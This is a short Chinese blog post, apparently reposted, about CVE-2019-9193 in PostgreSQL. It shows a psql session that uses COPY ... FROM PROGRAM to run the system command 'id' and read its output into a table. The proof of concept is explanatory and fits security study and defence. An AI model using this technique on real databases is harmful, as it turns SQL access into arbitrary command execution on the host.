CVE-2019–9193所谓的psql的提权漏洞?

来源:https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
翻译:https://nosec.org/home/detail/2368.html

描述

PostgreSQL 从9.3到最新的11.2版本默认开启,影响Linux,Windows,和Mac。可从SQL语句执行权限的用户提权到系统命令执行权限。

$ psql -V
psql (PostgreSQL) 10.6 (Ubuntu 10.6-0ubuntu0.18.04.1)
postgres@ubuntu:~$ psql
psql (10.6 (Ubuntu 10.6-0ubuntu0.18.04.1))
Type "help" for help.

postgres=# create table cmd_exec(cmd_output text);
CREATE TABLE
postgres=# copy cmd_exec from program 'id';
COPY 1
postgres=# select * from cmd_exec;
                               cmd_output
------------------------------------------------------------------------
 uid=103(postgres) gid=118(postgres) groups=118(postgres),105(ssl-cert)
(1 row)

CVE-2019–9193所谓的psql的提权漏洞?_第1张图片

你可能感兴趣的:(安全)